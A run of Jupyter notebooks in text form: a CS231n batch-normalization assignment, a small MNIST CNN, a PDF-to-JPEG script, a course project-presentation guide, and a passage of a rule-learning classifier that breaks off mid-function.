loop = qc.Loop(dac.ch1.sweep(0, 5, 1), 0.1).loop(dac.ch2.sweep(0, 5, 1), 0.1).each(
dmm.voltage
)
data = loop.get_data_set(name='2D_test')
# -
plot = qc.QtPlot()
plot.add(data.dmm_voltage, figsize=(1200, 500))
_ = loop.with_bg_task(plot.update, plot.save).run()
plot
|
docs/examples/Tutorial.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Batch Normalization
# One way to make deep networks easier to train is to use more sophisticated optimization procedures such as SGD+momentum, RMSProp, or Adam. Another strategy is to change the architecture of the network to make it easier to train. One idea along these lines is batch normalization which was recently proposed by [3].
#
# The idea is relatively straightforward. Machine learning methods tend to work better when their input data consists of uncorrelated features with zero mean and unit variance. When training a neural network, we can preprocess the data before feeding it to the network to explicitly decorrelate its features; this will ensure that the first layer of the network sees data that follows a nice distribution. However even if we preprocess the input data, the activations at deeper layers of the network will likely no longer be decorrelated and will no longer have zero mean or unit variance since they are output from earlier layers in the network. Even worse, during the training process the distribution of features at each layer of the network will shift as the weights of each layer are updated.
#
# The authors of [3] hypothesize that the shifting distribution of features inside deep neural networks may make training deep networks more difficult. To overcome this problem, [3] proposes to insert batch normalization layers into the network. At training time, a batch normalization layer uses a minibatch of data to estimate the mean and standard deviation of each feature. These estimated means and standard deviations are then used to center and normalize the features of the minibatch. A running average of these means and standard deviations is kept during training, and at test time these running averages are used to center and normalize features.
#
# It is possible that this normalization strategy could reduce the representational power of the network, since it may sometimes be optimal for certain layers to have features that are not zero-mean or unit variance. To this end, the batch normalization layer includes learnable shift and scale parameters for each feature dimension.
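The train-time recipe described above (minibatch mean/std, normalize, learnable scale and shift, running averages for test time) can be sketched in a few lines of NumPy. This is only an illustration of the idea; the function name and signature are made up here and are not the assignment's `batchnorm_forward` API.

```python
import numpy as np

def batchnorm_train_step(x, gamma, beta, running_mean, running_var,
                         eps=1e-5, momentum=0.9):
    # Per-feature statistics estimated from the minibatch
    mu = x.mean(axis=0)
    var = x.var(axis=0)
    # Center and normalize, then apply the learnable scale/shift
    x_hat = (x - mu) / np.sqrt(var + eps)
    out = gamma * x_hat + beta
    # Running averages, used in place of minibatch statistics at test time
    running_mean = momentum * running_mean + (1 - momentum) * mu
    running_var = momentum * running_var + (1 - momentum) * var
    return out, running_mean, running_var

np.random.seed(0)
x = 5.0 * np.random.randn(64, 3) + 12.0
out, rm, rv = batchnorm_train_step(x, np.ones(3), np.zeros(3),
                                   np.zeros(3), np.ones(3))
# With gamma=1, beta=0 the output has per-feature mean ~0 and std ~1
```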
#
# [3] <NAME> and <NAME>, "Batch Normalization: Accelerating Deep Network Training by Reducing
# Internal Covariate Shift", ICML 2015.
# +
# As usual, a bit of setup
from __future__ import print_function
import time
import numpy as np
import matplotlib.pyplot as plt
from cs231n.classifiers.fc_net import *
from cs231n.data_utils import get_CIFAR10_data
from cs231n.gradient_check import eval_numerical_gradient, eval_numerical_gradient_array
from cs231n.solver import Solver
# %matplotlib inline
plt.rcParams['figure.figsize'] = (10.0, 8.0) # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
# for auto-reloading external modules
# see http://stackoverflow.com/questions/1907993/autoreload-of-modules-in-ipython
# %load_ext autoreload
# %autoreload 2
def rel_error(x, y):
""" returns relative error """
return np.max(np.abs(x - y) / (np.maximum(1e-8, np.abs(x) + np.abs(y))))
# +
# Load the (preprocessed) CIFAR10 data.
data = get_CIFAR10_data()
for k, v in data.items():
print('%s: ' % k, v.shape)
# -
# ## Batch normalization: Forward
# In the file `cs231n/layers.py`, implement the batch normalization forward pass in the function `batchnorm_forward`. Once you have done so, run the following to test your implementation.
# +
# Check the training-time forward pass by checking means and variances
# of features both before and after batch normalization
# Simulate the forward pass for a two-layer network
np.random.seed(231)
N, D1, D2, D3 = 200, 50, 60, 3
X = np.random.randn(N, D1)
W1 = np.random.randn(D1, D2)
W2 = np.random.randn(D2, D3)
a = np.maximum(0, X.dot(W1)).dot(W2)
print('Before batch normalization:')
print(' means: ', a.mean(axis=0))
print(' stds: ', a.std(axis=0))
# Means should be close to zero and stds close to one
print('After batch normalization (gamma=1, beta=0)')
a_norm, _ = batchnorm_forward(a, np.ones(D3), np.zeros(D3), {'mode': 'train'})
print(' mean: ', a_norm.mean(axis=0))
print(' std: ', a_norm.std(axis=0))
# Now means should be close to beta and stds close to gamma
gamma = np.asarray([1.0, 2.0, 3.0])
beta = np.asarray([11.0, 12.0, 13.0])
a_norm, _ = batchnorm_forward(a, gamma, beta, {'mode': 'train'})
print('After batch normalization (nontrivial gamma, beta)')
print(' means: ', a_norm.mean(axis=0))
print(' stds: ', a_norm.std(axis=0))
# +
# Check the test-time forward pass by running the training-time
# forward pass many times to warm up the running averages, and then
# checking the means and variances of activations after a test-time
# forward pass.
np.random.seed(231)
N, D1, D2, D3 = 200, 50, 60, 3
W1 = np.random.randn(D1, D2)
W2 = np.random.randn(D2, D3)
bn_param = {'mode': 'train'}
gamma = np.ones(D3)
beta = np.zeros(D3)
for t in range(50):
X = np.random.randn(N, D1)
a = np.maximum(0, X.dot(W1)).dot(W2)
batchnorm_forward(a, gamma, beta, bn_param)
bn_param['mode'] = 'test'
X = np.random.randn(N, D1)
a = np.maximum(0, X.dot(W1)).dot(W2)
a_norm, _ = batchnorm_forward(a, gamma, beta, bn_param)
# Means should be close to zero and stds close to one, but will be
# noisier than training-time forward passes.
print('After batch normalization (test-time):')
print(' means: ', a_norm.mean(axis=0))
print(' stds: ', a_norm.std(axis=0))
# -
# ## Batch Normalization: backward
# Now implement the backward pass for batch normalization in the function `batchnorm_backward`.
#
# To derive the backward pass you should write out the computation graph for batch normalization and backprop through each of the intermediate nodes. Some intermediates may have multiple outgoing branches; make sure to sum gradients across these branches in the backward pass.
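To see why those branch gradients must be summed, consider a toy scalar graph (purely illustrative, unrelated to the batchnorm code) in which `x` has two outgoing branches:

```python
# Forward: x feeds two branches, which later recombine
x = 2.0
a = x ** 2      # branch 1
b = 3.0 * x     # branch 2
y = a * b       # y = 3*x**3, so analytically dy/dx = 9*x**2

# Backward: each branch sends a gradient back to x, and the two are SUMMED
dy = 1.0
da = dy * b                     # dy/da = b
db = dy * a                     # dy/db = a
dx = da * (2 * x) + db * 3.0    # contributions from both branches added
# dx == 9 * x**2 == 36.0
```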
#
# Once you have finished, run the following to numerically check your backward pass.
# +
# Gradient check batchnorm backward pass
np.random.seed(231)
N, D = 4, 5
x = 5 * np.random.randn(N, D) + 12
gamma = np.random.randn(D)
beta = np.random.randn(D)
dout = np.random.randn(N, D)
bn_param = {'mode': 'train'}
fx = lambda x: batchnorm_forward(x, gamma, beta, bn_param)[0]
fg = lambda a: batchnorm_forward(x, a, beta, bn_param)[0]
fb = lambda b: batchnorm_forward(x, gamma, b, bn_param)[0]
dx_num = eval_numerical_gradient_array(fx, x, dout)
da_num = eval_numerical_gradient_array(fg, gamma.copy(), dout)
db_num = eval_numerical_gradient_array(fb, beta.copy(), dout)
_, cache = batchnorm_forward(x, gamma, beta, bn_param)
dx, dgamma, dbeta = batchnorm_backward(dout, cache)
print('dx error: ', rel_error(dx_num, dx))
print('dgamma error: ', rel_error(da_num, dgamma))
print('dbeta error: ', rel_error(db_num, dbeta))
# -
# ## Batch Normalization: alternative backward (OPTIONAL, +3 points extra credit)
# In class we talked about two different implementations for the sigmoid backward pass. One strategy is to write out a computation graph composed of simple operations and backprop through all intermediate values. Another strategy is to work out the derivatives on paper. For the sigmoid function, it turns out that you can derive a very simple formula for the backward pass by simplifying gradients on paper.
#
# Surprisingly, it turns out that you can also derive a simple expression for the batch normalization backward pass if you work out derivatives on paper and simplify. After doing so, implement the simplified batch normalization backward pass in the function `batchnorm_backward_alt` and compare the two implementations by running the following. Your two implementations should compute nearly identical results, but the alternative implementation should be a bit faster.
#
# NOTE: This part of the assignment is entirely optional, but we will reward 3 points of extra credit if you can complete it.
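For orientation (the derivation itself is the exercise), the simplified form commonly derived on paper looks roughly like the sketch below. The function name, signature, and cached inputs here are illustrative and do not match the assignment's `batchnorm_backward_alt` API.

```python
import numpy as np

def batchnorm_backward_simplified(dout, x_hat, gamma, var, eps=1e-5):
    # One common paper-and-pencil simplification of the batchnorm backward
    # pass, expressed in terms of the normalized activations x_hat and the
    # (biased) minibatch variance.
    dx_hat = dout * gamma
    dx = (dx_hat - dx_hat.mean(axis=0)
          - x_hat * (dx_hat * x_hat).mean(axis=0)) / np.sqrt(var + eps)
    dgamma = (dout * x_hat).sum(axis=0)
    dbeta = dout.sum(axis=0)
    return dx, dgamma, dbeta
```

Checking any closed form you derive against a numerical gradient on a tiny input, as the cells below do, is the quickest way to catch a sign or scaling mistake.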
# +
np.random.seed(231)
N, D = 500, 5000
x = 5 * np.random.randn(N, D) + 12
gamma = np.random.randn(D)
beta = np.random.randn(D)
dout = np.random.randn(N, D)
bn_param = {'mode': 'train'}
out, cache = batchnorm_forward(x, gamma, beta, bn_param)
t1 = time.time()
dx1, dgamma1, dbeta1 = batchnorm_backward(dout, cache)
t2 = time.time()
dx2, dgamma2, dbeta2 = batchnorm_backward_alt(dout, cache)
t3 = time.time()
print('dx difference: ', rel_error(dx1, dx2))
print('dgamma difference: ', rel_error(dgamma1, dgamma2))
print('dbeta difference: ', rel_error(dbeta1, dbeta2))
print('speedup: %.2fx' % ((t2 - t1) / (t3 - t2)))
# -
# ## Fully Connected Nets with Batch Normalization
# Now that you have a working implementation for batch normalization, go back to your `FullyConnectedNet` in the file `cs231n/classifiers/fc_net.py`. Modify your implementation to add batch normalization.
#
# Concretely, when the flag `use_batchnorm` is `True` in the constructor, you should insert a batch normalization layer before each ReLU nonlinearity. The outputs from the last layer of the network should not be normalized. Once you are done, run the following to gradient-check your implementation.
#
# HINT: You might find it useful to define an additional helper layer similar to those in the file `cs231n/layer_utils.py`. If you decide to do so, do it in the file `cs231n/classifiers/fc_net.py`.
# +
np.random.seed(231)
N, D, H1, H2, C = 2, 15, 20, 30, 10
X = np.random.randn(N, D)
y = np.random.randint(C, size=(N,))
for reg in [0, 3.14]:
print('Running check with reg = ', reg)
model = FullyConnectedNet([H1, H2], input_dim=D, num_classes=C,
reg=reg, weight_scale=5e-2, dtype=np.float64,
use_batchnorm=True)
loss, grads = model.loss(X, y)
print('Initial loss: ', loss)
for name in sorted(grads):
f = lambda _: model.loss(X, y)[0]
grad_num = eval_numerical_gradient(f, model.params[name], verbose=False, h=1e-5)
print('%s relative error: %.2e' % (name, rel_error(grad_num, grads[name])))
if reg == 0: print()
# -
# # Batchnorm for deep networks
# Run the following to train a six-layer network on a subset of 1000 training examples both with and without batch normalization.
# +
np.random.seed(231)
# Try training a very deep net with batchnorm
hidden_dims = [100, 100, 100, 100, 100]
num_train = 1000
small_data = {
'X_train': data['X_train'][:num_train],
'y_train': data['y_train'][:num_train],
'X_val': data['X_val'],
'y_val': data['y_val'],
}
weight_scale = 2e-2
bn_model = FullyConnectedNet(hidden_dims, weight_scale=weight_scale, use_batchnorm=True)
model = FullyConnectedNet(hidden_dims, weight_scale=weight_scale, use_batchnorm=False)
bn_solver = Solver(bn_model, small_data,
num_epochs=10, batch_size=50,
update_rule='adam',
optim_config={
'learning_rate': 1e-3,
},
verbose=True, print_every=200)
bn_solver.train()
solver = Solver(model, small_data,
num_epochs=10, batch_size=50,
update_rule='adam',
optim_config={
'learning_rate': 1e-3,
},
verbose=True, print_every=200)
solver.train()
# -
# Run the following to visualize the results from two networks trained above. You should find that using batch normalization helps the network to converge much faster.
# +
plt.subplot(3, 1, 1)
plt.title('Training loss')
plt.xlabel('Iteration')
plt.subplot(3, 1, 2)
plt.title('Training accuracy')
plt.xlabel('Epoch')
plt.subplot(3, 1, 3)
plt.title('Validation accuracy')
plt.xlabel('Epoch')
plt.subplot(3, 1, 1)
plt.plot(solver.loss_history, 'o', label='baseline')
plt.plot(bn_solver.loss_history, 'o', label='batchnorm')
plt.subplot(3, 1, 2)
plt.plot(solver.train_acc_history, '-o', label='baseline')
plt.plot(bn_solver.train_acc_history, '-o', label='batchnorm')
plt.subplot(3, 1, 3)
plt.plot(solver.val_acc_history, '-o', label='baseline')
plt.plot(bn_solver.val_acc_history, '-o', label='batchnorm')
for i in [1, 2, 3]:
plt.subplot(3, 1, i)
plt.legend(loc='upper center', ncol=4)
plt.gcf().set_size_inches(15, 15)
plt.show()
# -
# # Batch normalization and initialization
# We will now run a small experiment to study the interaction of batch normalization and weight initialization.
#
# The first cell will train 8-layer networks both with and without batch normalization using different scales for weight initialization. The second cell will plot training accuracy, validation set accuracy, and training loss as a function of the weight initialization scale.
# +
np.random.seed(231)
# Try training a very deep net with batchnorm
hidden_dims = [50, 50, 50, 50, 50, 50, 50]
num_train = 1000
small_data = {
'X_train': data['X_train'][:num_train],
'y_train': data['y_train'][:num_train],
'X_val': data['X_val'],
'y_val': data['y_val'],
}
bn_solvers = {}
solvers = {}
weight_scales = np.logspace(-4, 0, num=20)
for i, weight_scale in enumerate(weight_scales):
print('Running weight scale %d / %d' % (i + 1, len(weight_scales)))
bn_model = FullyConnectedNet(hidden_dims, weight_scale=weight_scale, use_batchnorm=True)
model = FullyConnectedNet(hidden_dims, weight_scale=weight_scale, use_batchnorm=False)
bn_solver = Solver(bn_model, small_data,
num_epochs=10, batch_size=50,
update_rule='adam',
optim_config={
'learning_rate': 1e-3,
},
verbose=False, print_every=200)
bn_solver.train()
bn_solvers[weight_scale] = bn_solver
solver = Solver(model, small_data,
num_epochs=10, batch_size=50,
update_rule='adam',
optim_config={
'learning_rate': 1e-3,
},
verbose=False, print_every=200)
solver.train()
solvers[weight_scale] = solver
# +
# Plot results of weight scale experiment
best_train_accs, bn_best_train_accs = [], []
best_val_accs, bn_best_val_accs = [], []
final_train_loss, bn_final_train_loss = [], []
for ws in weight_scales:
best_train_accs.append(max(solvers[ws].train_acc_history))
bn_best_train_accs.append(max(bn_solvers[ws].train_acc_history))
best_val_accs.append(max(solvers[ws].val_acc_history))
bn_best_val_accs.append(max(bn_solvers[ws].val_acc_history))
final_train_loss.append(np.mean(solvers[ws].loss_history[-100:]))
bn_final_train_loss.append(np.mean(bn_solvers[ws].loss_history[-100:]))
plt.subplot(3, 1, 1)
plt.title('Best val accuracy vs weight initialization scale')
plt.xlabel('Weight initialization scale')
plt.ylabel('Best val accuracy')
plt.semilogx(weight_scales, best_val_accs, '-o', label='baseline')
plt.semilogx(weight_scales, bn_best_val_accs, '-o', label='batchnorm')
plt.legend(ncol=2, loc='lower right')
plt.subplot(3, 1, 2)
plt.title('Best train accuracy vs weight initialization scale')
plt.xlabel('Weight initialization scale')
plt.ylabel('Best training accuracy')
plt.semilogx(weight_scales, best_train_accs, '-o', label='baseline')
plt.semilogx(weight_scales, bn_best_train_accs, '-o', label='batchnorm')
plt.legend()
plt.subplot(3, 1, 3)
plt.title('Final training loss vs weight initialization scale')
plt.xlabel('Weight initialization scale')
plt.ylabel('Final training loss')
plt.semilogx(weight_scales, final_train_loss, '-o', label='baseline')
plt.semilogx(weight_scales, bn_final_train_loss, '-o', label='batchnorm')
plt.legend()
plt.gca().set_ylim(1.0, 3.5)
plt.gcf().set_size_inches(10, 15)
plt.show()
# -
# # Question:
# Describe the results of this experiment, and try to give a reason why the experiment gave the results that it did.
# # Answer:
#
|
assignment2/BatchNormalization_2017.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# Imports
# + pycharm={"name": "#%%\n"}
import tensorflow as tf
import numpy as np
from tensorflow.keras import datasets, layers, models, losses, regularizers
import matplotlib.pyplot as plt
# -
# Load mnist and reshape
# + pycharm={"name": "#%%\n"}
mnist = datasets.mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train = x_train.reshape(len(x_train), 28, 28, 1)
x_test = x_test.reshape(len(x_test), 28, 28, 1)
# + [markdown] pycharm={"name": "#%% md\n"}
# Reduce train data
#
#
# + pycharm={"name": "#%%\n"}
max_per_class = 10
counter = {}
min_x_train = []
min_y_train = []
for i in range(len(y_train)):
if y_train[i] not in counter:
counter[y_train[i]] = 0
if counter[y_train[i]] == max_per_class:
continue
min_x_train.append(x_train[i])
min_y_train.append(y_train[i])
counter[y_train[i]] += 1
x_train = np.array(min_x_train)
y_train = np.array(min_y_train)
# -
# Create model
# + pycharm={"name": "#%%\n"}
model = models.Sequential()
model.add(layers.Conv2D(32, kernel_size=(3, 3), strides=(1,1), activation='relu', input_shape=(28, 28, 1), kernel_regularizer=regularizers.l2(0.001)))
model.add(layers.Dropout(0.3))
model.add(layers.MaxPool2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu', kernel_regularizer=regularizers.l2(0.003)))
model.add(layers.Dropout(0.5))
model.add(layers.MaxPool2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu', kernel_regularizer=regularizers.l2(0.003)))
model.add(layers.Dropout(0.9))
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu', kernel_regularizer=regularizers.l2(0.001)))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(10, kernel_regularizer=regularizers.l2(0.002)))
model.summary()
model.compile(optimizer='adam',
loss=losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
# -
# Train
# + pycharm={"name": "#%%\n"}
history = model.fit(x_train, y_train, epochs=400, validation_data=(x_test, y_test))
# -
# View results and training progression
# + pycharm={"name": "#%%\n"}
train_loss, train_acc = model.evaluate(x_train, y_train, verbose=2)
print('Train stats:', train_loss, train_acc)
test_loss, test_acc = model.evaluate(x_test, y_test, verbose=2)
print('Test stats:', test_loss, test_acc)
# +
plt.plot(history.history['accuracy'], label='accuracy')
plt.plot(history.history['val_accuracy'], label='val_accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim([0.5, 1])
plt.legend(loc='lower right')
train_loss, train_acc = model.evaluate(x_train, y_train, verbose=2)
print('Train stats:', train_loss, train_acc)
test_loss, test_acc = model.evaluate(x_test, y_test, verbose=2)
print('Test stats:', test_loss, test_acc)
# -
print(history.history.keys())
|
cnn/10_cnn_proc_83_test.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# import module
from pdf2image import convert_from_path
import glob
import tqdm
import os
# +
files = glob.glob('/cndd2/fangming/projects/scf_enhancers/figures/figureshic_map*.pdf')
print(files)
# +
# Store Pdf with convert_from_path function
for file in tqdm.tqdm(files):
images = convert_from_path(file)
for i, img in enumerate(images):
output = "{}_{}.jpg".format(file.replace('.pdf', ''), i)
print(output)
img.save(output, 'JPEG')
# -
|
archives/hic/try_pdf_to_jpg.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <img style="float: right; margin: 0px 0px 15px 15px;" src="https://upload.wikimedia.org/wikipedia/commons/b/b6/Proyecto_en_construccion.jpg" width="300px" height="100px" />
#
#
# # Guide for project presentations.
# > This specifies the basic components that every project must have. The project must be a problem that can be modeled with the tools covered in the module. For the first module, that means optimization.
# ___
# ## 1. Deliverable.
# Projects must include the following basic components.
#
# ### 1.1 Project title.
# > It must describe the work.
#
# ### 1.2 Objectives.
# > - These state the purposes for which the work is done.
# > - They must be concrete, assessable, and verifiable.
# > - They must be written in the infinitive.
# > #### 1.1 General objective.
# > - The ultimate goal of the study. It is formulated around the global purpose of the work and gives no details.
# > - It addresses the work as a whole and relates to the project title.
# > #### 1.2 Specific objectives
# > - They describe each component of the work in detail.
# > - Together they guarantee that the general objective is achieved.
#
# Reference:
# - https://es.slideshare.net/rosbur/metodologia-objetivos-generales-y-especficos
#
# ### 1.3 Model representing the problem.
# > - Include the equations that govern the system under study.
# > - Derivation of the model: a detailed explanation of the equations according to the problem to be solved or the model to be represented.
# > - What situation does the model represent? What are its fundamental limitations?
# > - Meaning and value of the parameters (constants appearing in the model).
#
# ### 1.4 Solution of the problem.
# > - The problem must be solved.
# > - Did the algorithm lead to a feasible solution?
#
# ### 1.5 Visualization of the solution.
# > Show plots and/or tables that adequately illustrate the results. Do not forget to label the axes, and if a single plot has several curves, label them too (make sure the curves can be distinguished by colors and line styles).
#
# ### 1.6 Conclusions.
# > Be careful: conclusions are not just anything. You must conclude with respect to the stated objectives, in light of the results obtained.
#
# ### 1.7 References.
# > Cite the bibliography used (in APA format).
# ___
# ## 2. Additional specifications.
# Each group must have a minimum of two and a maximum of three members. For purely logistical purposes, please number yourselves as *member 1*, *member 2*, and *member 3*.
#
# ### 2.1 Jupyter notebook.
# > All of the items above must be developed in a Jupyter notebook named `ProyectoModulo1_ApellidoN1_ApellidoN2_ApellidoN3`, where `ApellidoNi` is the maternal last name and first-name initial of member `i`.
#
# ### 2.2 Presentation.
# > Remember that half of the project grade is the work itself and half is the presentation. You must prepare a PowerPoint presentation of the work for the class on Monday, April 29. Besides all the basic components described in the deliverable, the presentation must include a table of contents.
# > - **IT MUST NOT CONTAIN CODE; THAT IS WHAT THE NOTEBOOK REPORT IS FOR**
# > - Presentation: 10 minutes.
# > - Follow these recommendations: https://es.slideshare.net/MeireComputacion/power-point-pautas-para-una-buen-trabajo
# <script>
# $(document).ready(function(){
# $('div.prompt').hide();
# $('div.back-to-top').hide();
# $('nav#menubar').hide();
# $('.breadcrumb').hide();
# $('.hidden-print').hide();
# });
# </script>
#
# <footer id="attribution" style="float:right; color:#808080; background:#fff;">
# Created with Jupyter by <NAME>.
# </footer>
|
Modulo2/GuiaProyecto.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
import math
# -
#
# Each Rule consists of an antecedent (left-hand side) and a consequent (right-hand side). The LHS is a conjunction of conditions joined with AND, and the RHS is a class label. The Rule also stores its accuracy and coverage, as well as the list of indexes of the rows it covers.
class Rule:
def __init__(self, class_label):
self.conditions = [] # list of conditions
self.class_label = class_label # rule class
self.accuracy = 0
self.coverage = 0
self.coverage_list =[] # indexes of the rows this rule covers
def addCondition(self, condition):
self.conditions.append(condition)
def setParams(self, accuracy, coverage, coverage_list):
self.accuracy = accuracy
self.coverage = coverage
self.coverage_list = coverage_list
# Human-readable printing of this Rule
def __repr__(self):
return "If {} then {}. Coverage:{}, accuracy: {}".format(self.conditions, self.class_label,
self.coverage, self.accuracy)
# The list of conditions contains several objects of class _Condition_.
#
# Each condition includes the _attribute name_, its _value_, and a list of indexes _all_ for all rows that have that value.
#
# If the _value_ is numeric, then the condition also includes an additional field `true_false` which means the following:
# - *if true_false == True then values are >= value*
# - *if true_false == False then values are < value*
# - If *true_false is None*, then this condition is simply of form *categorical attribute = value*.
# +
class Condition:
def __init__(self, attribute, value, all, true_false=None):
self.attribute = attribute
self.value = value
self.all = all # index of all rows that have this attributes value.
self.true_false = true_false
def __repr__(self):
if self.true_false is None:
return "{}={}".format(self.attribute, self.value)
else:
return "{}>={}:{}".format(self.attribute, self.value, self.true_false)
# -
# First we call the _parse_ function to get some necessary information out of our data. _parse_ accepts a dataframe and processes the data to get back a dataframe containing only the unique values of each column.
# It also returns the names of all the attribute columns and the class name.
# +
def parse(data):
    # probably a better way to do this, see https://stackoverflow.com/questions/54196959/is-there-any-faster-alternative-to-col-drop-duplicates
new_df = []
[new_df.append(pd.DataFrame(data[i].unique(), columns=[i])) for i in data.columns]
new_df = pd.concat(new_df, axis=1)
columns_list = data.columns.to_numpy().tolist()
class_name = columns_list.pop(-1)
return (new_df,columns_list, class_name)
# -
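# As a hedged aside (not part of the original algorithm), the per-column unique-value table that _parse_ builds can also be written as a dict comprehension over `pd.Series`. A self-contained sketch on toy data, not the contact-lenses set:

```python
import pandas as pd

# Toy dataframe standing in for the real dataset.
data = pd.DataFrame({
    "outlook": ["sunny", "sunny", "rainy", "overcast"],
    "play": ["no", "yes", "yes", "yes"],
})

# One Series of unique values per column; pandas pads shorter columns with NaN.
unique_df = pd.concat(
    {col: pd.Series(data[col].unique()) for col in data.columns}, axis=1
)
print(unique_df)
```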
# We use this function to decide whether one rule is better than another,
# and update a list of rules based on the result. The function accepts two rules and a list of rules.
# It compares the accuracy and coverage of the rules as follows:
# if rule one has better accuracy, or equal accuracy and better coverage, than rule two,
# it updates the list to hold only rule one. If they are equal in accuracy and coverage,
# it appends rule one to the list of rules. Finally, if rule one is worse than rule two, it does nothing.
# _compare_ then returns the updated list of rules.
# +
def compare(rule1, rule2, rule_list):
if rule1.accuracy > rule2.accuracy:
rule2 = rule1
rule_list = [rule2]
elif rule1.accuracy == rule2.accuracy:
if rule1.coverage > rule2.coverage:
rule2 = rule1
rule_list = [rule2]
elif rule1.coverage == rule2.coverage:
rule_list.append(rule1)
return rule_list
# -
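# The accuracy-then-coverage preference that _compare_ implements is lexicographic, so (as an aside, not part of the original code) the same ordering can be expressed with a tuple sort key. This sketch uses a stand-in namedtuple rather than the Rule class, so it runs on its own:

```python
from collections import namedtuple

# Stand-in for Rule: only the two fields the comparison looks at.
R = namedtuple("R", ["accuracy", "coverage"])

rules = [R(0.8, 10), R(1.0, 3), R(1.0, 7), R(0.9, 50)]

# Lexicographic preference: higher accuracy first, coverage breaks ties.
best_first = sorted(rules, key=lambda r: (r.accuracy, r.coverage), reverse=True)
print(best_first[0])
```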
# We use this function to deep-copy one rule into another.
# It accepts the rule to copy from, an empty rule,
# and the index of the last condition to copy. It returns the new rule populated with the data of the old rule.
#
def Copy(x, rule, i ):
rule.class_label = x.class_label
for j in range(i+1):
attribute = x.conditions[j].attribute
value = x.conditions[j].value
all = x.conditions[j].all
true_false = x.conditions[j].true_false
temp = Condition(attribute, value, all, true_false)
rule.addCondition(temp)
rule.accuracy =x.accuracy
rule.coverage = x.coverage
rule.coverage_list = x.coverage_list
return rule
# Helper function that creates a new rule for a new condition.
# It accepts a rule to start from, a dataframe of the rows covered by the new condition,
# a dataframe of all rows with the given attribute value, the attribute, the attribute value,
# the minimum coverage allowed, the class label for when x is empty, and the number of conditions
# the new rule should have. It builds a rule from all these values and returns it. If the rule falls
# below min_coverage, it returns None.
# +
def makeRule(x, subset, all_subset, truefalse, attribute, value, min_coverage, class_label = None, i = 0):
numCount = len(subset)
denCount = len(all_subset)
if denCount == 0 or numCount < min_coverage:
return None
temp_coverage_list = np.array(subset.index)
    if x is not None:
temp_rule = Rule(None)
temp_rule = Copy(x, temp_rule, i)
else:
temp_rule = Rule(class_label)
temp_cond = Condition(attribute, value, np.array(all_subset.index), truefalse)
temp_rule.addCondition(temp_cond)
temp_rule.accuracy = numCount / denCount
temp_rule.coverage = numCount
temp_rule.coverage_list = temp_coverage_list
return temp_rule
# -
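# _makeRule_ computes accuracy as the number of covered rows with the right class divided by all rows matching the condition, and coverage as the former count. A self-contained illustration of that arithmetic with pandas boolean masks (toy data, not the real dataset):

```python
import pandas as pd

data = pd.DataFrame({
    "astigmatism": ["no", "no", "yes", "yes", "yes"],
    "lenses":      ["soft", "soft", "hard", "hard", "none"],
})

# Condition: astigmatism == "yes"; target class: "hard".
all_subset = data[data["astigmatism"] == "yes"]  # rows matching the condition
subset = data[(data["astigmatism"] == "yes") & (data["lenses"] == "hard")]  # ...and correctly classified

accuracy = len(subset) / len(all_subset)
coverage = len(subset)
print(accuracy, coverage)
```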
# Once we have our best rules with one condition whose accuracy is less than one,
# we use this function to refine the rules as much as possible and return the best one.
#
# The function works by running a loop that finds the best possible conditions to add in order to increase accuracy.
# Every iteration of the loop adds a new condition, and it stops only when either accuracy one is reached
# or no condition was added in an iteration.
#
# The function accepts the data, the names of the column attributes, the list of rules we want to refine,
# a dataframe with all the unique attribute values, the class name, and the minimum coverage.
# It returns the first of the best rules found.
#
# +
def refine_rule(data, column_list, rule_list, un_data, class_name, min_coverage ):
count = 0
while(True):
count+=1
temp = Rule(None)
temp.accuracy = -math.inf
temp.coverage = -math.inf
real_best_rules = [temp]
for x in rule_list:
# This temporarily gets rid of all rows that don't have the attributes of the first conditions.
new_df = data[data.index.isin(x.conditions[count - 1].all)]
if len(new_df.index) >= min_coverage:
Sbest_rules = x
best_rules = [Sbest_rules]
for y in column_list:
for z in un_data[y]:
flag = False
if pd.isnull(z):
continue
#Special cases for if the value is numeric
if isinstance(z, int) or isinstance(z, float):
flag = True
                            subset = new_df[(new_df[y] >= z) & (new_df[class_name] == x.class_label)]
all_subset = new_df[new_df[y] >= z]
truefalse = True
else:
subset = new_df[( new_df[y] == z) & ( new_df[class_name] == x.class_label)]
all_subset = new_df[ new_df[y] == z]
truefalse = None
temp_rule = makeRule(x, subset, all_subset, truefalse, y, z, min_coverage, None, count - 1)
                        if temp_rule is not None:
best_rules = compare(temp_rule, Sbest_rules, best_rules)
Sbest_rules = best_rules[0]
if flag:
                            subset = new_df[(new_df[y] < z) & (new_df[class_name] == x.class_label)]
all_subset = new_df[new_df[y] < z]
temp_rule = makeRule(x, subset, all_subset, False, y, z, min_coverage, None, count - 1)
                            if temp_rule is not None:
best_rules = compare(temp_rule, Sbest_rules, best_rules)
Sbest_rules = best_rules[0]
real_best_rules = compare(best_rules[0], real_best_rules[0], real_best_rules)
if real_best_rules[0].accuracy == 1 or rule_list[0] == real_best_rules[0]:
